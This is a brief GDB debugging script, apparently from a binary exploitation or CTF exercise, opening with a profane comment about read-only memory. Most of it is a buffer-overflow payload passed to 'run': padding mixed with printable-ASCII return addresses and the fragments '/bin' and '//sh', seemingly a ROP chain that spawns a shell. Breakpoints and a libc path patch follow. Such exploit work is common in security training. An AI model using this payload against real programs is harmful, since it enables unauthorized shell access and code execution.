# read only memory... so annoying to debug without fucking up my env. Maybe i should start using docker
b *0x0804856b
run "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAY5_UX5_UW pU3zmU/bins?aUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX5_U[ pU3zmU//shs?aUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABVjU_ pUs?aUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF,_UW pUQ*mU_ pU"
set $new_addr = (char*) malloc(15)
set {char[15]} $new_addr = "./libc-2.15.so"
set *((char**)($esp)) = $new_addr
d 1
b *0x55596F6E
d 3
b *vuln
c
hb *0x556a5642
